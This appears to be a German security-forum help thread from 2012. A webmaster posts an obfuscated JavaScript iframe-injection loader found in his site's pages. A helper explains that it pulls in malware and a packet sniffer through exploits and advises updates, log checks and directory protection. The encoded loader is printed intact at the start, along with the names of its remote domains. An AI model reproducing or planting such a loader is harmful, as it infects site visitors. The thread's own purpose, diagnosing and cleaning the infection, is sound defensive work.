5j55j28j23j28.5j18.5j30j29j22.5j51.5j50j56j47.5j53.5j49.5j30j16j19.5j28.5j5.5j3.5j3.5j61.5j5.5j3.5j3.5j50j57.5j54j48.5j57j51.5j54.5j54j15j51.5j50j56j47.5j53.5j49.5j56j19j19.5j60.5j5.5j3.5j3.5j3.5j58j47.5j56j15j50j15j29.5j15j49j54.5j48.5j57.5j53.5j49.5j54j57j22j48.5j56j49.5j47.5j57j49.5j33.5j53j49.5j53.5j49.5j54j57j19j18.5j51.5j50j56j47.5j53.5j49.5j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j56.5j56j48.5j18.5j21j18.5j51j57j57j55j28j22.5j22.5j59j47.5j57j49.5j50.5j54.5j54j22j51.5j54j22.5j48.5j54.5j57.5j54j57j24j27j22j55j51j55j18.5j19.5j28.5j50j22j56.5j57j59.5j53j49.5j22j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j29.5j18.5j51j51.5j49j49j49.5j54j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j55j54.5j56.5j51.5j57j51.5j54.5j54j29.5j18.5j47.5j48j56.5j54.5j53j57.5j57j49.5j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j53j49.5j50j57j29.5j18.5j23j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j57j54.5j55j29.5j18.5j23j18.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j58.5j51.5j49j57j51j18.5j21j18.5j23.5j23j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j51j49.5j51.5j50.5j51j57j18.5j21j18.5j23.5j23j18.5j19.5j28.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j22j47.5j55j55j49.5j54j49j32.5j51j51.5j53j49j19j50j19.5j28.5j5.5j3.5j3.5j61.5".split("j");for(i=0;i!=567;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(q);</script>

Kann mir jemand sagen was das ist?
Ich hab das Script jetzt einfach aus dem Quelltext rausgenommen. Jetzt funktioniert alles wieder wunderbar. Aber wie konnte da bitte jemand was ändern?

Passwörter und Zugänge kenn nur ich, und sind nirgendwo gespeichert.

Über eure Hilfe wäre ich sehr dankbar.

MfG
Sokon

markusg · 13.03.2012, 18:01

ich schau mal, moment
hast du alle sicherheitsupdates für deinen webauftritt eingespielt?

Sokon · 13.03.2012, 19:49

Danke dir schonmal.

Also die Seite ist rein HTML und PHP selbstgeschrieben.
Arbeitet noch nichtmal mit einer SQL-Datenbank.

Falls noch mehr Infos benötigt werden, schreib gerne.

markusg · 13.03.2012, 19:51

kannst ja mal den link posten bitte.
in der form:
hxxp//meineseite.de

markusg · 13.03.2012, 20:21

danke für den link
gibts eig auch logs vom server, ftp zugänge etc, da könnten wir evtl. etwas raus finden.

Sokon · 13.03.2012, 21:17

Hab inzwischen mit dem Hoster telefoniert.
Log gibts leider nicht. Weder FTP noch anderes.

Hab vorsorglich also nur Passwörter geändert.

Kann trotzdem jemand was über das Script sagen?

markusg · 13.03.2012, 21:38

sag ich dir morgen.
hoster mal gefragt was man evtl. noch an der serversicherheit machen kann?
.htaccess schutz etc?

Sokon · 13.03.2012, 21:44

Ja hab mit denen dadrüber gesprochen.
Die Server stehen in Deutschland und werden täglich gegen jegliche Bedrohungen kontrolliert und geschützt.

Für meinen Webspace könnte ich noch einen Verzeichnisschutz aktivieren. Da kann man dann gar nichts schreiben in bestimmten Ordnern. Problem ist dann dabei aber dass Foren etc. auch nicht mehr nutzbar sind.

Sokon · 13.03.2012, 21:56

Okay, jetzt wird es krank.

Der Code steht in allen Index.html/php's auf dem kompletten Space bei mir.
Also auch in anderen Ordnern. Andere Seiten.

Sokon · 13.03.2012, 22:36

Neue Erkentnis:

Die betroffenen Seiten suchen Verbindung zu xategon.in und honedju.in

markusg · 14.03.2012, 12:03

ja und noch andere.
den verzeichniss schutz kannst du ja für einige verzeichnisse aktivieren, und für andere nicht.
nen forum, hatte ich gar nicht gesehen, wie aktuell ist die forensoftware?
Verzeichnisschutz/Passwortschutz mit htaccess sowie SSI/PHP

Sokon · 14.03.2012, 17:28

Naja war eine Wordpress-Installation mit einigen Plugins.
War für einen Internen Bereich gedacht.

Hab schon gehört dass Wordpress da recht anfällig ist.
Sicherheitslücken in Theme, Plugins etc.

markusg · 14.03.2012, 17:55

und hast du da schon mal die neuesten updates instaliert und unnötige plugins aussortiert?
ich würd übrigens ne warnung auf deinen sites plazieren, da wird doch einiges an malware geladen
ein packet sniffer und noch einiges anderes was ich mir noch nicht weiter angesehen hab.
exploits werden einige genutzt um das zeug zu instalieren.
die leute können sich ja dann hier für weitere analysen melden

13.03.2012, 18:01	#2
markusg /// Malware-holic	Script in HTML-Quellcode ich schau mal, moment hast du alle sicherheitsupdates für deinen webauftritt eingespielt? __________________ __________________

13.03.2012, 19:51	#4
markusg /// Malware-holic	Script in HTML-Quellcode kannst ja mal den link posten bitte. in der form: hxxp//meineseite.de __________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet

Script in HTML-Quellcode

Log-Analyse und Auswertung: Script in HTML-Quellcode